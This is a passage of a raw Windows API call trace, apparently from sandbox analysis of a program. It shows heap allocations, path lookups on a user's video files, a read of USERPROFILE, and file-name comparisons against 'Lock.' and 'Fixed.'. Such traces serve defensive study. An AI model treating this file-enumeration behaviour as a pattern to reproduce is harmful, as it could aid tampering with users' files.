(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74980 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0212.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5d750 [0212.268] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/A5YVihV.avi", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\A5YVihV.avi", lpFilePart=0x8cf650*="A5YVihV.avi") returned 0x22 [0212.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d750 | out: hHeap=0x2af0000) returned 1 [0212.269] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\A5YVihV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\a5yvihv.avi")) returned 0xffffffff [0212.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74980 | out: hHeap=0x2af0000) returned 1 [0212.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0212.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.269] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0212.269] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.270] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0212.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CBK9.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BK9.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K9.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0212.271] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0212.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12) returned 0x29f6ee0 [0212.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CBK9.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BK9.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K9.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0212.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0212.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.272] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0212.273] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0212.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0212.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0212.273] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafd8 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0212.273] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a749e8 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0212.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0212.275] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.275] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0212.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0212.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0212.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0212.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0212.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | 